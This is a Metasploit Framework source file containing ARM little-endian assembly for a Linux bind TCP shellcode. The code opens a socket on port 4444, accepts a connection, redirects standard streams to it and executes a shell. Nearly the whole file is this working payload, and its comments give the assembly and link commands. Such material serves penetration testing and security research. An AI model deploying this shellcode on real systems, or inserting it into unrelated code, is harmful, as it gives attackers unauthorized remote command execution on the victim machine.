metasploit-framework/external/source/shellcode/linux/armle/single_sock_bind.s

103 lines
2.1 KiB
ArmAsm
Raw Normal View History

@@
@
@ Name: single_sock_bind
@ Qualities: -
@ Authors: civ, repmovsb
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux bind TCP shellcode for ARM LE architecture.
@
@ This source is built from the payload module (instead of other way around...)
@
@ Assemble with: as single_sock_bind.s -o single_sock_bind.o
@ Link with: ld single_sock_bind.o -o single_sock_bind
@
@ Meta-Information:
@
@ meta-shortname=Linux Bind TCP
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=civ, repmovsb
@ meta-os=linux
@ meta-arch=armle
@ meta-category=singles
@ meta-connection-type=bind
@ meta-name=bind_tcp
@@
.text
.globl _start
_start:
@ int socket(int domain, int type, int protocol);
@ socket(2,1,6)
mov r0, #2
mov r1, #1
mov r2, #6
mov r7, #1
lsl r7, r7, #8
add r7, r7, #25
svc 0
mov r6, r0
@ bind
add r1, pc, #128
mov r2, #16
mov r7, #1
lsl r7, r7, #8
add r7, r7, #26
svc 0
@ listen
mov r0, r6
mov r7, #1
lsl r7, r7, #8
add r7, r7, #28
svc 0
@ accept
mov r0, r6
sub r1, r1, r1
sub r2, r2, r2
mov r7, #1
lsl r7, r7, #8
add r7, r7, #29
svc 0
@ dup
mov r6, r0
mov r1, #2
loop:
mov r0, r6
mov r7, #63
svc 0
subs r1, r1, #1
bpl loop
@ execve(SHELL, [SHELLARG], [NULL])
add r0, pc, #36
eor r4, r4, r4
push {r4}
mov r2, sp
add r4, pc, #36
push {r4}
mov r1, sp
mov r7, #11
svc 0
@ addr
@ port: 4444 , sin_fam = 2
.word 0x5c110002
@ ip: 0.0.0.0
.word 0x00000000
@ SHELL
.word 0x00000000 @ the shell goes here!
.word 0x00000000
.word 0x00000000
.word 0x00000000
@ SHELLARG
.word 0x00000000 @ the args!
.word 0x00000000
.word 0x00000000
.word 0x00000000